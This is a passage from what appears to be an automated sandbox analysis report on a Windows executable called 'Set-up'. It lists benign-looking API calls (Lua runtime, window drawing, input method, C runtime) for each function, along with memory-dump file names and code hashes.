                                                                                          • luaL_setfuncs.SET-UP(?,00C38968,00000000), ref: 00BEE425
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BEE43D
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BEE454
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_setfuncs
                                                                                          • String ID: %s expected$function at line %d$main function$multiple Lua VMs detected$too many %s (limit is %d) in %s$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 2970048142-2974239533
                                                                                          • Opcode ID: c7a6f0a6407e52a3b5c3d7608601439551ef37018325ca463bbe0f54022c0e2f
                                                                                          • Instruction ID: f745f93afcc440c6187502b870f8971714f9430e80e1ba20a40080a1393ece0f
                                                                                          • Opcode Fuzzy Hash: c7a6f0a6407e52a3b5c3d7608601439551ef37018325ca463bbe0f54022c0e2f
                                                                                          • Instruction Fuzzy Hash: 8241D1B0600B049FD730AF29D841B5B77E4EF48704F1049A9F89997782EB70ED058B85
                                                                                          APIs
                                                                                          • luaL_where.SET-UP(?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA5B
                                                                                            • Part of subcall function 00BDA9D0: lua_getstack.SET-UP(?,00BDA842,?,?), ref: 00BDA9EC
                                                                                            • Part of subcall function 00BDA9D0: lua_getinfo.SET-UP(?,00C5F488,?,?,?,?), ref: 00BDAA02
                                                                                            • Part of subcall function 00BDA9D0: lua_pushfstring.SET-UP(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 00BDAA1C
                                                                                          • lua_pushvfstring.SET-UP(?,00BDA842,?,?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA68
                                                                                          • lua_concat.SET-UP(?,00000002,?,?,00BDA842,?,stack overflow), ref: 00BDAA73
                                                                                          • lua_error.SET-UP(?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA7C
                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,?,?,?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA98
                                                                                          • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00BDAAD4
                                                                                          • lua_pushfstring.SET-UP(?,%s: %s,00000000,00000000), ref: 00BDAAED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: lua_pushfstring$L_where_errnolua_concatlua_errorlua_getinfolua_getstacklua_pushvfstringstrerror
                                                                                          • String ID: %s: %s
                                                                                          • API String ID: 4280543744-3740598653
                                                                                          • Opcode ID: 8576c3b5805f12f1dcf178e7af920fc5da514ffc0fb8999e528f96811b9628d9
                                                                                          • Instruction ID: fef0bebde15c01ef1794c08dbde40de9489c1c124c3690b8417c236fe7baad3a
                                                                                          • Opcode Fuzzy Hash: 8576c3b5805f12f1dcf178e7af920fc5da514ffc0fb8999e528f96811b9628d9
                                                                                          • Instruction Fuzzy Hash: AE21B472501704AFD7119F08DC06BAAB7E8EF02325F44809AF81957392E7B6A951CBE6
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,00000000), ref: 00A73F66
                                                                                          • SetWindowLongW.USER32(?,00000000,?), ref: 00A73F8B
                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00A73FAF
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00A74288
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long$Proc
                                                                                          • String ID:
                                                                                          • API String ID: 3468714886-0
                                                                                          • Opcode ID: 8c88e709d36671888fa4d4d19abf75404b91ddcea4842a34e2f17b51ef1ca922
                                                                                          • Instruction ID: 9f76c0405a61061ec672199a5f08085cb59e4d4a9e676f161841d4f7e929bd88
                                                                                          • Opcode Fuzzy Hash: 8c88e709d36671888fa4d4d19abf75404b91ddcea4842a34e2f17b51ef1ca922
                                                                                          • Instruction Fuzzy Hash: F4A15C71A00219DFDB20DF64CD88BAEBBB8FB48700F1185A9E54AEB251CB355950DF60
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 00A685AA
                                                                                          • GetDC.USER32(?), ref: 00A68632
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00A68642
                                                                                          • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00A686D6
                                                                                          • GetTextExtentPoint32A.GDI32(?,?,?,00000000), ref: 00A68703
                                                                                          • GetTextMetricsW.GDI32(?,?), ref: 00A68713
                                                                                          • SelectObject.GDI32(?,?), ref: 00A6872B
                                                                                          • ReleaseDC.USER32(?,?), ref: 00A6873A
                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00A687F8
                                                                                          • MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6880B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Text$ExtentMetricsObjectPoint32Select$RectReleaseSystemWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3087991924-0
                                                                                          • Opcode ID: 58b5a782068f586e08d61f9ed2f3e9fb18ed3d2c35e78ca0afee3232ac1a98d6
                                                                                          • Instruction ID: aaeea1129b18d535ca94bfcc29e48f8372d1f82d73bf1dbfad55685822a5833a
                                                                                          • Opcode Fuzzy Hash: 58b5a782068f586e08d61f9ed2f3e9fb18ed3d2c35e78ca0afee3232ac1a98d6
                                                                                          • Instruction Fuzzy Hash: A191267190022ADFCB209F54DD84BADBBB5FF44300F0082D9E88AA7255DB349AA4CF90
                                                                                          APIs
                                                                                          • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,70576E16,?,?), ref: 00A8A60C
                                                                                          • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?), ref: 00A8A625
                                                                                          • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?), ref: 00A8A64D
                                                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?), ref: 00A8A763
                                                                                            • Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
                                                                                            • Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD12
                                                                                            • Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD4D
                                                                                          • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP140(00000000,?), ref: 00A8A6A7
                                                                                          • ??0facet@locale@std@@IAE@I@Z.MSVCP140(00000000), ref: 00A8A6C1
                                                                                          • ?_Getcoll@_Locinfo@std@@QBE?AU_Collvec@@XZ.MSVCP140(?), ref: 00A8A6DA
                                                                                          • ??1_Locinfo@std@@QAE@XZ.MSVCP140 ref: 00A8A6EE
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8A721
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00A8A74B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locinfo@std@@_invalid_parameter_noinfo_noreturn$??0_??1_Lockit@std@@$??0facet@locale@std@@Bid@locale@std@@Collvec@@Facet_Getcoll@_Getgloballocale@locale@std@@Locimp@12@Registermallocstd::_
                                                                                          • String ID:
                                                                                          • API String ID: 62940681-0
                                                                                          • Opcode ID: 82817a166486a9353c1a6f3835ed9d1d075470d251a25ea0a40fea697924c754
                                                                                          • Instruction ID: 9f52a3d7938ac117748ddb8af859d244dbabf8bfbd183be73e30a48915aa5a49
                                                                                          • Opcode Fuzzy Hash: 82817a166486a9353c1a6f3835ed9d1d075470d251a25ea0a40fea697924c754
                                                                                          • Instruction Fuzzy Hash: 6F51D271900248DFEB04EF94D988BAEFBB5FF94310F15816AE406A73A1DB74AE44CB51
                                                                                          APIs
                                                                                          • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,70576E16,?,?,?), ref: 00A8A7CC
                                                                                          • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?), ref: 00A8A7E5
                                                                                          • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?), ref: 00A8A80D
                                                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?), ref: 00A8A923
                                                                                            • Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
                                                                                            • Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD12
                                                                                            • Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD4D
                                                                                          • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP140(00000000,?,?), ref: 00A8A867
                                                                                          • ??0facet@locale@std@@IAE@I@Z.MSVCP140(00000000), ref: 00A8A881
                                                                                          • ?_Getcoll@_Locinfo@std@@QBE?AU_Collvec@@XZ.MSVCP140(?), ref: 00A8A89A
                                                                                          • ??1_Locinfo@std@@QAE@XZ.MSVCP140 ref: 00A8A8AE
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8A8E1
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00A8A90B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locinfo@std@@_invalid_parameter_noinfo_noreturn$??0_??1_Lockit@std@@$??0facet@locale@std@@Bid@locale@std@@Collvec@@Facet_Getcoll@_Getgloballocale@locale@std@@Locimp@12@Registermallocstd::_
                                                                                          • String ID:
                                                                                          • API String ID: 62940681-0
                                                                                          • Opcode ID: 8a671779ea08df3e4959fe1805ed7028100a889aeaccefcf0fac30b90e1528a4
                                                                                          • Instruction ID: ad4d07c99257c3ccf0284d0bfa0bc8f2d25fe55f9cd3d92a8e8580423a05148b
                                                                                          • Opcode Fuzzy Hash: 8a671779ea08df3e4959fe1805ed7028100a889aeaccefcf0fac30b90e1528a4
                                                                                          • Instruction Fuzzy Hash: 4E51D071900248DFEB04EF98D988BAEFBB5FF94310F158069E416A7391CB74AD41CB62
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,00BE294D,?,00000000,?,?), ref: 00BED5C8
                                                                                          • memcpy.VCRUNTIME140(?,?,0000003B,?,?,?,00BE294D,?,00000000,?,?), ref: 00BED5D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: ...$...$[string "
                                                                                          • API String ID: 3510742995-3302822706
                                                                                          • Opcode ID: 47753fbb1368dc5b342626a8c036c210683d5b011022ddec6267a0c9cbb54e0d
                                                                                          • Instruction ID: 7399d0055babd91f8e21a1b4441a1c264cb40a887720ecb8b6c89ba7d697928f
                                                                                          • Opcode Fuzzy Hash: 47753fbb1368dc5b342626a8c036c210683d5b011022ddec6267a0c9cbb54e0d
                                                                                          • Instruction Fuzzy Hash: FE316FAA9041922EC7311B29AC81BBFBBA8DF95354B2540B7FE58D3311EB514C29C3F5
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Caret$ContextDeleteDestroyHideObject$ChildNotifyRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1512358881-0
                                                                                          • Opcode ID: 9fe092676e4cc5f2275eb212354102465b2526466b1630efa6c32d1107afb5bf
                                                                                          • Instruction ID: 17661d017b408dd21ec0125d89661ed7169440b834f5f6cf8ee483224382f911
                                                                                          • Opcode Fuzzy Hash: 9fe092676e4cc5f2275eb212354102465b2526466b1630efa6c32d1107afb5bf
                                                                                          • Instruction Fuzzy Hash: AA319C753006009FDB209F79EC48BAEBBE4AF48719F108529F99BC7291DB71AC01CB91
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A72C92
                                                                                          • memcpy.VCRUNTIME140(?,?), ref: 00A72CDD
                                                                                          • ImmGetContext.IMM32(?,?,?,?,?), ref: 00A72DA2
                                                                                          • ImmSetCompositionStringW.IMM32(00000000,00020000,?,?,00000000,00000000), ref: 00A72DC6
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,00000000,?), ref: 00A72F9D
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,00000000,?), ref: 00A72FEE
                                                                                          • ImmReleaseContext.IMM32(?,?), ref: 00A7302E
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A73065
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A730B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Context$CompositionReleaseStringmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2573622734-0
                                                                                          • Opcode ID: eada91b3e7500a3d61efd3f26f7ded293625d1749429f888856aa9d70ea334fc
                                                                                          • Instruction ID: 53a2270906d7947d51322af454113e302539ea4500f9d73067320316e442b79d
                                                                                          • Opcode Fuzzy Hash: eada91b3e7500a3d61efd3f26f7ded293625d1749429f888856aa9d70ea334fc
                                                                                          • Instruction Fuzzy Hash: 45027D71900219DFDB24CF68CD84BAEBBB5EF49304F14C1A8E419AB255DB31AE85DF60
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63BC0
                                                                                          • DeleteObject.GDI32(?), ref: 00A63BCB
                                                                                          • DeleteDC.GDI32(?), ref: 00A63BD6
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63C09
                                                                                          • DeleteObject.GDI32(00000000), ref: 00A63C0E
                                                                                          • CreateSolidBrush.GDI32(?), ref: 00A63C23
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A63C30
                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00A63C40
                                                                                            • Part of subcall function 00A63670: CreateCompatibleDC.GDI32(?), ref: 00A636A6
                                                                                            • Part of subcall function 00A63670: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00A63727
                                                                                            • Part of subcall function 00A63670: SelectObject.GDI32(?,00000000), ref: 00A63741
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CreateDelete$BrushCompatibleFrameRectSectionSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3456466422-0
                                                                                          • Opcode ID: b70c7d81d4060ec37966a3aad0e65331a6997249eee0555afe500d1e1ae25afc
                                                                                          • Instruction ID: ae70348ac4d1d671c37e41ffe37ff2d639a3b87ab0629f2d11682f48d8ceae25
                                                                                          • Opcode Fuzzy Hash: b70c7d81d4060ec37966a3aad0e65331a6997249eee0555afe500d1e1ae25afc
                                                                                          • Instruction Fuzzy Hash: 87B134726083028FCB14CF58C984A6ABBF5FF88744F05492DF99597311D731EA4ACB92
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00A6F687
                                                                                          • ImmGetContext.IMM32(?), ref: 00A6F702
                                                                                          • ImmSetCompositionWindow.IMM32(00000000,00000002,?,?,?,00000000), ref: 00A6F798
                                                                                          • ImmReleaseContext.IMM32(?,00000000,?,?,00000000), ref: 00A6F7A0
                                                                                          • DefWindowProcW.USER32(?,0000010F,?,?), ref: 00A6F7D5
                                                                                          • DefWindowProcW.USER32(?,?,?,?,?), ref: 00A6F84F
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00A6F880
                                                                                          • DefWindowProcW.USER32(?,?,?,?,70576E16), ref: 00A6F8B5
                                                                                          • DefWindowProcW.USER32(?,?,?,?,70576E16), ref: 00A6F8CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Proc$Context$CompositionRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1324245488-0
                                                                                          • Opcode ID: 42a1129d33ffb3068562e7b848e2ed3b18d3f9a71dcf5879538b6ade115bbef6
                                                                                          • Instruction ID: c01faceafdf70cf84856a50930c2f053b72e27f8c71eb334dc6274664e465c7f
                                                                                          • Opcode Fuzzy Hash: 42a1129d33ffb3068562e7b848e2ed3b18d3f9a71dcf5879538b6ade115bbef6
